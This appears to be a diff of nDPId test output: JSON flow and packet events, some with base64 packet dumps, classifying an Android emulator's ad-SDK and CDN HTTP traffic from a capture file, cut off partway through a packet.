-01703{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2285,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385184845,"flow_last_seen":1654385184845,"flow_idle_time":7580000,"flow_min_l4_payload_len":1044,"flow_max_l4_payload_len":1044,"flow_tot_l4_payload_len":1044,"flow_avg_l4_payload_len":1044,"midstream":1,"thread_ts_msec":1654385184845,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"202.153.196.53","src_port":58758,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"tw.api.vpon.com","url":"tw.api.vpon.com\/api\/webviewAdReq?s_w=411&s_h=731&u_w=411&u_h=683&u_sd=2.625&lang=en_US&ni=0&sdk=vpadn-sdk-a-v4.6.4&u_o=1&os_v=30&n_mnc=260&n_mcc=310&mnc=260&mcc=310&format=320x50_mb&msid=com.sceneway.kankan&app_name=30.android.com.sceneway.kankan&simulator=0&cap=cal_m2_a_inv_cam_ph_sms_comp_fr_banInv_vid_vid2_vid3_vid4_vid5_crazyAd_cal_stoPic_exp&output=html&pf=TW&sid=1654385180339&seq=0&bid=8a8081824ff371e0014ff95e599f072d&adtest=0&ad_x=0&ad_y=0&ad_w=0&ad_h=0&ad_v=0&ms=C5QEn98CxlhiR4J%2FlC6Jf%2BtJncJYA72vXPe2O30%2FS7VTBF1NaLeAFAR5FIfYrRaYSVaBH%2BSKUFr11A2FE8GRJzLjt3bu0AA46LRogz0hoDRpsqbVLYu0zYcV0c0VkdMXnVfJhjpJRgKcxHWo4vQzq6LswfA0t80W6gGyFv5IyzBT6b6E1FNHU2pQIOg0j9WNqraa%2BiGRqWm5ptj1pymrNv7tznIxuy%2FwOIXeDKq%2BPJOWztIn5uQ1CdG%2B%2BPd0orwc&build=21407102","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36(Mobile; vpadn-sdk-a-v4.6.4)"}} +01703{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2285,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385184845,"flow_last_seen":1654385184845,"flow_idle_time":7580000,"flow_min_l4_payload_len":1044,"flow_max_l4_payload_len":1044,"flow_tot_l4_payload_len":1044,"flow_avg_l4_payload_len":1044,"midstream":1,"thread_ts_msec":1654385184845,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"202.153.196.53","src_port":58758,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"tw.api.vpon.com","url":"tw.api.vpon.com\/api\/webviewAdReq?s_w=411&s_h=731&u_w=411&u_h=683&u_sd=2.625&lang=en_US&ni=0&sdk=vpadn-sdk-a-v4.6.4&u_o=1&os_v=30&n_mnc=260&n_mcc=310&mnc=260&mcc=310&format=320x50_mb&msid=com.sceneway.kankan&app_name=30.android.com.sceneway.kankan&simulator=0&cap=cal_m2_a_inv_cam_ph_sms_comp_fr_banInv_vid_vid2_vid3_vid4_vid5_crazyAd_cal_stoPic_exp&output=html&pf=TW&sid=1654385180339&seq=0&bid=8a8081824ff371e0014ff95e599f072d&adtest=0&ad_x=0&ad_y=0&ad_w=0&ad_h=0&ad_v=0&ms=C5QEn98CxlhiR4J%2FlC6Jf%2BtJncJYA72vXPe2O30%2FS7VTBF1NaLeAFAR5FIfYrRaYSVaBH%2BSKUFr11A2FE8GRJzLjt3bu0AA46LRogz0hoDRpsqbVLYu0zYcV0c0VkdMXnVfJhjpJRgKcxHWo4vQzq6LswfA0t80W6gGyFv5IyzBT6b6E1FNHU2pQIOg0j9WNqraa%2BiGRqWm5ptj1pymrNv7tznIxuy%2FwOIXeDKq%2BPJOWztIn5uQ1CdG%2B%2BPd0orwc&build=21407102","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36(Mobile; vpadn-sdk-a-v4.6.4)"}} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2286,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385184857,"flow_last_seen":1654385184857,"flow_idle_time":7580000,"flow_min_l4_payload_len":1044,"flow_max_l4_payload_len":1044,"flow_tot_l4_payload_len":1044,"flow_avg_l4_payload_len":1044,"midstream":1,"thread_ts_msec":1654385184857,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"202.153.196.53","src_port":58760,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01865{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2286,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":181,"flow_packet_id":1,"flow_last_seen":1654385184857,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1110,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1110,"pkt_l4_len":1076,"thread_ts_msec":1654385184857,"pkt":"tKXvZygQnLbQ0+MzCABFAARIYtxAAEAGgd7AqAJ+ypnENeWIAFCaSZQVPGdPqYAYAfZWMAAAAQEICr1yaPVMk1rLR0VUIC9hcGkvd2Vidmlld0FkUmVxP3Nfdz03MzEmc19oPTQxMSZ1X3c9NjgzJnVfaD00MTEmdV9zZD0yLjYyNSZsYW5nPWVuX1VTJm5pPTAmc2RrPXZwYWRuLXNkay1hLXY0LjYuNCZ1X289MiZvc192PTMwJm5fbW5jPTI2MCZuX21jYz0zMTAmbW5jPTI2MCZtY2M9MzEwJmZvcm1hdD0zMjB4NTBfbWImbXNpZD1jb20uc2NlbmV3YXkua2Fua2FuJmFwcF9uYW1lPTMwLmFuZHJvaWQuY29tLnNjZW5ld2F5LmthbmthbiZzaW11bGF0b3I9MCZjYXA9Y2FsX20yX2FfaW52X2NhbV9waF9zbXNfY29tcF9mcl9iYW5JbnZfdmlkX3ZpZDJfdmlkM192aWQ0X3ZpZDVfY3JhenlBZF9jYWxfc3RvUGljX2V4cCZvdXRwdXQ9aHRtbCZwZj1UVyZzaWQ9MTY1NDM4NTE4MDMzOSZzZXE9MSZiaWQ9OGE4MDgxODI0ZmYzNzFlMDAxNGZmOTVlNTk5ZjA3MmQmYWR0ZXN0PTAmYWRfeD0wJmFkX3k9MCZhZF93PTAmYWRfaD0wJmFkX3Y9MCZtcz1DNVFFbjk4Q3hsaGlSNEolMkZsQzZKZiUyQnRKbmNKWUE3MnZYUGUyTzMwJTJGUzdWVEJGMU5hTGVBRkFSNUZJZllyUmFZU1ZhQkglMkJTS1VGcjExQTJGRThHUkp6TGp0M2J1MEFBNDZMUm9nejBob0RScHNxYlZMWXUwelljVjBjMFZrZE1YblZmSmhqcEpSZ0tjeEhXbzR2UXpxNkxzd2ZBMHQ4MFc2Z0d5RnY1SXl6QlQ2YjZFMUZOSFUycFFJT2cwajlXTnFyYWElMkJpR1JxV201cHRqMXB5bXJOdjd0em5JeHV5JTJGd09JWGVES3ElMkJQSk9XenRJbjV1UTFDZEclMkIlMkJQZDBvcndjJmJ1aWxkPTIxNDA3MTAyIEhUVFAvMS4xDQpIb3N0OiB0dy5hcGkudnBvbi5jb20NCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wIChMaW51eDsgQW5kcm9pZCAxMTsgc2RrX2dwaG9uZV94ODYgQnVpbGQvUlNSMS4yMDEwMTMuMDAxOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzgzLjAuNDEwMy4xMDYgTW9iaWxlIFNhZmFyaS81MzcuMzYoTW9iaWxlOyB2cGFkbi1zZGstYS12NC42LjQpDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANCg0K"} -01703{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2286,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385184857,"flow_last_seen":1654385184857,"flow_idle_time":7580000,"flow_min_l4_payload_len":1044,"flow_max_l4_payload_len":1044,"flow_tot_l4_payload_len":1044,"flow_avg_l4_payload_len":1044,"midstream":1,"thread_ts_msec":1654385184857,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"202.153.196.53","src_port":58760,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"tw.api.vpon.com","url":"tw.api.vpon.com\/api\/webviewAdReq?s_w=731&s_h=411&u_w=683&u_h=411&u_sd=2.625&lang=en_US&ni=0&sdk=vpadn-sdk-a-v4.6.4&u_o=2&os_v=30&n_mnc=260&n_mcc=310&mnc=260&mcc=310&format=320x50_mb&msid=com.sceneway.kankan&app_name=30.android.com.sceneway.kankan&simulator=0&cap=cal_m2_a_inv_cam_ph_sms_comp_fr_banInv_vid_vid2_vid3_vid4_vid5_crazyAd_cal_stoPic_exp&output=html&pf=TW&sid=1654385180339&seq=1&bid=8a8081824ff371e0014ff95e599f072d&adtest=0&ad_x=0&ad_y=0&ad_w=0&ad_h=0&ad_v=0&ms=C5QEn98CxlhiR4J%2FlC6Jf%2BtJncJYA72vXPe2O30%2FS7VTBF1NaLeAFAR5FIfYrRaYSVaBH%2BSKUFr11A2FE8GRJzLjt3bu0AA46LRogz0hoDRpsqbVLYu0zYcV0c0VkdMXnVfJhjpJRgKcxHWo4vQzq6LswfA0t80W6gGyFv5IyzBT6b6E1FNHU2pQIOg0j9WNqraa%2BiGRqWm5ptj1pymrNv7tznIxuy%2FwOIXeDKq%2BPJOWztIn5uQ1CdG%2B%2BPd0orwc&build=21407102","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36(Mobile; vpadn-sdk-a-v4.6.4)"}} +01703{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2286,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385184857,"flow_last_seen":1654385184857,"flow_idle_time":7580000,"flow_min_l4_payload_len":1044,"flow_max_l4_payload_len":1044,"flow_tot_l4_payload_len":1044,"flow_avg_l4_payload_len":1044,"midstream":1,"thread_ts_msec":1654385184857,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"202.153.196.53","src_port":58760,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"tw.api.vpon.com","url":"tw.api.vpon.com\/api\/webviewAdReq?s_w=731&s_h=411&u_w=683&u_h=411&u_sd=2.625&lang=en_US&ni=0&sdk=vpadn-sdk-a-v4.6.4&u_o=2&os_v=30&n_mnc=260&n_mcc=310&mnc=260&mcc=310&format=320x50_mb&msid=com.sceneway.kankan&app_name=30.android.com.sceneway.kankan&simulator=0&cap=cal_m2_a_inv_cam_ph_sms_comp_fr_banInv_vid_vid2_vid3_vid4_vid5_crazyAd_cal_stoPic_exp&output=html&pf=TW&sid=1654385180339&seq=1&bid=8a8081824ff371e0014ff95e599f072d&adtest=0&ad_x=0&ad_y=0&ad_w=0&ad_h=0&ad_v=0&ms=C5QEn98CxlhiR4J%2FlC6Jf%2BtJncJYA72vXPe2O30%2FS7VTBF1NaLeAFAR5FIfYrRaYSVaBH%2BSKUFr11A2FE8GRJzLjt3bu0AA46LRogz0hoDRpsqbVLYu0zYcV0c0VkdMXnVfJhjpJRgKcxHWo4vQzq6LswfA0t80W6gGyFv5IyzBT6b6E1FNHU2pQIOg0j9WNqraa%2BiGRqWm5ptj1pymrNv7tznIxuy%2FwOIXeDKq%2BPJOWztIn5uQ1CdG%2B%2BPd0orwc&build=21407102","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/83.0.4103.106 Mobile Safari\/537.36(Mobile; vpadn-sdk-a-v4.6.4)"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2287,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385184927,"flow_last_seen":1654385184927,"flow_idle_time":7580000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":183,"flow_tot_l4_payload_len":183,"flow_avg_l4_payload_len":183,"midstream":1,"thread_ts_msec":1654385184927,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.66.2.90","src_port":35664,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00714{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2287,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":182,"flow_packet_id":1,"flow_last_seen":1654385184927,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":249,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":249,"pkt_l4_len":215,"thread_ts_msec":1654385184927,"pkt":"tKXvZygQnLbQ0+MzCABFAADrwv9AAEAGn0vAqAJ+EkICWotQAFAVBORyMNia64AYAfbYnwAAAQEICiE3Bh4xvbnrR0VUIC9jdXN0b21lcnMvNDVkNGIwOWViYS9pbWFnZS9sYW1iZGFfanBnXzg5LzM5ODEwMTIzNGU2Y2Y1YjNhOGQ4LmpwZyBIVFRQLzEuMQ0KSG9zdDogY2RuLmxpZnRvZmYuaW8NCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IEFwYWNoZS1IdHRwQ2xpZW50L1VOQVZBSUxBQkxFIChqYXZhIDEuNCkNCg0K"} -00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2287,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385184927,"flow_last_seen":1654385184927,"flow_idle_time":7580000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":183,"flow_tot_l4_payload_len":183,"flow_avg_l4_payload_len":183,"midstream":1,"thread_ts_msec":1654385184927,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.66.2.90","src_port":35664,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": {"hostname":"cdn.liftoff.io","url":"cdn.liftoff.io\/customers\/45d4b09eba\/image\/lambda_jpg_89\/398101234e6cf5b3a8d8.jpg","code":0,"content_type":"","user_agent":"Apache-HttpClient\/UNAVAILABLE (java 1.4)"}} +00866{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2287,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385184927,"flow_last_seen":1654385184927,"flow_idle_time":7580000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":183,"flow_tot_l4_payload_len":183,"flow_avg_l4_payload_len":183,"midstream":1,"thread_ts_msec":1654385184927,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.66.2.90","src_port":35664,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": {"hostname":"cdn.liftoff.io","url":"cdn.liftoff.io\/customers\/45d4b09eba\/image\/lambda_jpg_89\/398101234e6cf5b3a8d8.jpg","code":0,"content_type":"","user_agent":"Apache-HttpClient\/UNAVAILABLE (java 1.4)"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2288,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385184928,"flow_last_seen":1654385184928,"flow_idle_time":7580000,"flow_min_l4_payload_len":233,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":233,"flow_avg_l4_payload_len":233,"midstream":1,"thread_ts_msec":1654385184928,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.66.2.90","src_port":35666,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00784{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2288,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":183,"flow_packet_id":1,"flow_last_seen":1654385184928,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":299,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":299,"pkt_l4_len":265,"thread_ts_msec":1654385184928,"pkt":"tKXvZygQnLbQ0+MzCABFAAEdY4hAAEAG\/pDAqAJ+EkICWotSAFAcu+o2K8tK74AYAfbY0QAAAQEICiE3Bh\/fUp7nR0VUIC9jdXN0b21lcnMvNDVkNGIwOWViYS92aWRlb3MvbW9iaWxlL2ZkNTY5MmRkNTMwNDJiMTk5ZTAzLm1wNCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogRGFsdmlrLzIuMS4wIChMaW51eDsgVTsgQW5kcm9pZCAxMTsgc2RrX2dwaG9uZV94ODYgQnVpbGQvUlNSMS4yMDEwMTMuMDAxKQ0KSG9zdDogY2RuLmxpZnRvZmYuaW8NCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkFjY2VwdC1FbmNvZGluZzogZ3ppcA0KDQo="} -00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2288,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385184928,"flow_last_seen":1654385184928,"flow_idle_time":7580000,"flow_min_l4_payload_len":233,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":233,"flow_avg_l4_payload_len":233,"midstream":1,"thread_ts_msec":1654385184928,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.66.2.90","src_port":35666,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"MpegDash.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2288,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385184928,"flow_last_seen":1654385184928,"flow_idle_time":7580000,"flow_min_l4_payload_len":233,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":233,"flow_avg_l4_payload_len":233,"midstream":1,"thread_ts_msec":1654385184928,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.66.2.90","src_port":35666,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"MpegDash.AmazonAWS","breed":"Acceptable","category":"Cloud"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2289,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385184938,"flow_last_seen":1654385184938,"flow_idle_time":7580000,"flow_min_l4_payload_len":345,"flow_max_l4_payload_len":345,"flow_tot_l4_payload_len":345,"flow_avg_l4_payload_len":345,"midstream":1,"thread_ts_msec":1654385184938,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.64.103.30","src_port":36636,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00930{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2289,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":184,"flow_packet_id":1,"flow_last_seen":1654385184938,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":411,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":411,"pkt_l4_len":377,"thread_ts_msec":1654385184938,"pkt":"tKXvZygQnLbQ0+MzCABFAAGNDvVAAEAG7fHAqAJ+EkBnHo8cAFCNQDOZ5EMz0IAYAfY+BAAAAQEICpxRp0pGLP+jR0VUIC9ydi16aXAtMjAyMi8wNDI4L3RwbDQtNDIwOWFkODQ1ZTYxZDlhZDY3YjZmMDQxODdkMDBiZTAuemlwP21kNWZpbGVuYW1lPTQyMDlhZDg0NWU2MWQ5YWQ2N2I2ZjA0MTg3ZDAwYmUwJmZvbGRlcm5hbWU9dHBsNCZsYXlvdXQ9MSZ0cGw9NCZ3ZnI9MSZ0bz05OTk5JmFsZWNmYz0xJndoc19jaG49bSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogRGFsdmlrLzIuMS4wIChMaW51eDsgVTsgQW5kcm9pZCAxMTsgc2RrX2dwaG9uZV94ODYgQnVpbGQvUlNSMS4yMDEwMTMuMDAxKQ0KSG9zdDogaHliaXJkLnJheWp1bXAuY29tDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANCg0K"} -01010{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2289,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385184938,"flow_last_seen":1654385184938,"flow_idle_time":7580000,"flow_min_l4_payload_len":345,"flow_max_l4_payload_len":345,"flow_tot_l4_payload_len":345,"flow_avg_l4_payload_len":345,"midstream":1,"thread_ts_msec":1654385184938,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.64.103.30","src_port":36636,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": {"hostname":"hybird.rayjump.com","url":"hybird.rayjump.com\/rv-zip-2022\/0428\/tpl4-4209ad845e61d9ad67b6f04187d00be0.zip?md5filename=4209ad845e61d9ad67b6f04187d00be0&foldername=tpl4&layout=1&tpl=4&wfr=1&to=9999&alecfc=1&whs_chn=m","code":0,"content_type":"","user_agent":"Dalvik\/2.1.0 (Linux; U; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001)"}} +01010{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2289,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1654385184938,"flow_last_seen":1654385184938,"flow_idle_time":7580000,"flow_min_l4_payload_len":345,"flow_max_l4_payload_len":345,"flow_tot_l4_payload_len":345,"flow_avg_l4_payload_len":345,"midstream":1,"thread_ts_msec":1654385184938,"l3_proto":"ip4","src_ip":"192.168.2.126","dst_ip":"18.64.103.30","src_port":36636,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.AmazonAWS","breed":"Acceptable","category":"Cloud"},"http": {"hostname":"hybird.rayjump.com","url":"hybird.rayjump.com\/rv-zip-2022\/0428\/tpl4-4209ad845e61d9ad67b6f04187d00be0.zip?md5filename=4209ad845e61d9ad67b6f04187d00be0&foldername=tpl4&layout=1&tpl=4&wfr=1&to=9999&alecfc=1&whs_chn=m","code":0,"content_type":"","user_agent":"Dalvik\/2.1.0 (Linux; U; Android 11; sdk_gphone_x86 Build\/RSR1.201013.001)"}} 01446{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2290,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":182,"flow_packet_id":2,"flow_last_seen":1654385184942,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":797,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":797,"pkt_l4_len":763,"thread_ts_msec":1654385184942,"pkt":"nLbQ0+MztKXvZygQCABFAAMPiZsAAPgGXosSQgJawKgCfgBQi1Aw2JrrFQTlKYAYAIOpEgAAAQEICjG9uf0hNwYeSFRUUC8xLjEgMjAwIE9LDQpDb250ZW50LVR5cGU6IGltYWdlL2pwZWcNCkNvbnRlbnQtTGVuZ3RoOiAyMzgwOTMNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkRhdGU6IE1vbiwgMTQgTWFyIDIwMjIgMDU6MDY6MTcgR01UDQpBY2Nlc3MtQ29udHJvbC1BbGxvdy1PcmlnaW46ICoNCkFjY2Vzcy1Db250cm9sLUFsbG93LU1ldGhvZHM6IEdFVA0KQWNjZXNzLUNvbnRyb2wtRXhwb3NlLUhlYWRlcnM6IEFjY2Vzcy1Db250cm9sLUFsbG93LU9yaWdpbg0KQWNjZXNzLUNvbnRyb2wtTWF4LUFnZTogMzAwDQpMYXN0LU1vZGlmaWVkOiBNb24sIDE0IE1hciAyMDIyIDA0OjU5OjQ0IEdNVA0KRVRhZzogIjFkZjIzOTBkYzI0MGEyYmY3MjAzZWVjYWUzYTcyMTNiIg0KeC1hbXotc2VydmVyLXNpZGUtZW5jcnlwdGlvbjogQUVTMjU2DQpDYWNoZS1Db250cm9sOiBtYXgtYWdlPTMxNTM2MDAwO3B1YmxpYw0KeC1hbXotbWV0YS1sYW1iZGE6IG5vZGUtYXBwDQpBY2NlcHQtUmFuZ2VzOiBieXRlcw0KU2VydmVyOiBBbWF6b25TMw0KWC1DYWNoZTogSGl0IGZyb20gY2xvdWRmcm9udA0KVmlhOiAxLjEgZWVkZjhhYzU2ZTRlMWVjM2IyNDA1NTc1MTRkZjlkNjQuY2xvdWRmcm9udC5uZXQgKENsb3VkRnJvbnQpDQpYLUFtei1DZi1Qb3A6IFRYTDUwLVAxDQpYLUFtei1DZi1JZDogM0tzOHpnV1VFd1BsYUtHLTFsclAtOWxwV3JPTWhZSjJIcktoYnR3ZG9SY3VJYi16WDBTSm9nPT0NCkFnZTogNzE1MDgwOA0KDQo="} 02396{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2291,"source":"1kxun.pcap","alias":"nDPId-test","flow_id":182,"flow_packet_id":3,"flow_last_seen":1654385184942,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1494,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1494,"pkt_l4_len":1460,"thread_ts_msec":1654385184942,"pkt":"nLbQ0+MztKXvZygQCABFAAXIiZwAAPgGW9ESQgJawKgCfgBQi1Aw2J3GFQTlKYAQAIO33wAAAQEICjG9uf4hNwYe\/9j\/4AAQSkZJRgABAQAAZABkAAD\/2wBDAAQCAwMDAgQDAwMEBAQEBQkGBQUFBQsICAYJDQsNDQ0LDAwOEBQRDg8TDwwMEhgSExUWFxcXDhEZGxkWGhQWFxb\/2wBDAQQEBAUFBQoGBgoWDwwPFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhYWFhb\/wAARCAQ4B4ADAREAAhEBAxEB\/8QAHQABAAAHAQEAAAAAAAAAAAAAAAECAwQFBgcICf\/EAGgQAAEDAgQDBAYDBw4JBwsACwEAAgMEEQUGITEHEkETIlFhCBQycYGxQpGhFSMzNFJy0QkWNTZTYmR0gpKissHhFyQlN0NWc3WUGCZGVFWT8Bk4RGNlg4SVs8LU8SdFdrTEw9KFpeP\/xAAdAQEAAwEBAQEBAQAAAAAAAAAAAQIDBAUHBggJ\/8QAShEBAAIBAwIEAwQIBQEHAwALAAECEQMEIRIxBQZBURNhcQciMoEUMzVykaGxwSM0QlLR4RUWJFNigvCSwvElQ0RUorIIJmNz4v\/aAAwDAQACEQMRAD8A9\/ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIIFBBBKggUEpQS9ClRTKsJSqjyQumOz+U6pQS11wbEbEJ27LxMxzDZcrZldC4U9Y67ToHn+1d+33f+m79D4b4xak9GrPDJY7lujxaI1NA5sVRa9hs9erp62I55h0eI+BaG+r8Xbfdv7ektJrqeooah0FXE6N7T1C6eLRw\/Ca+21ttedPVriYUS5RhlEIB3iowscyCAd0BRGEWuOxUwYOYXKRCUAfFMI7osJa7mjJY4dQUwisTWc1nDMYLmjF8OI5ZzNGN2P1VJ0627vY2Xj2+2nEWzHtLaMHzlhGIjsMSgEDnaXIu0rC2haI45fqtn5m2e5jo3Femf5KmPZPoMSpjV4Y5jS4XBYdCvP1dtW3biXVu\/BdDcU+LoTH5NAxWgqcOq3U9VGWObtpuvPtSaTiX5DcbfU0LzS8Ylbs6qjmTMCCKKpkVTNCIlMiEW9UVTAeKKyi0dEGSy9geJ4zUdjQUr5NdXWs1vvKiZxD0vDfB974lqdG2pM\/P0j83R8o8K6eMtlxaR1RJ+5R6NH6VSb+z6l4L9m+hpxF99bqn2jt\/1dCwTLVFQwhlPTQwt8GtCpmZfQtn4Vs9pXp0dOIj5QysNFAwagu96h6ERCvFGxvssaLeAQVBe2iBylA5SgcpQOUoH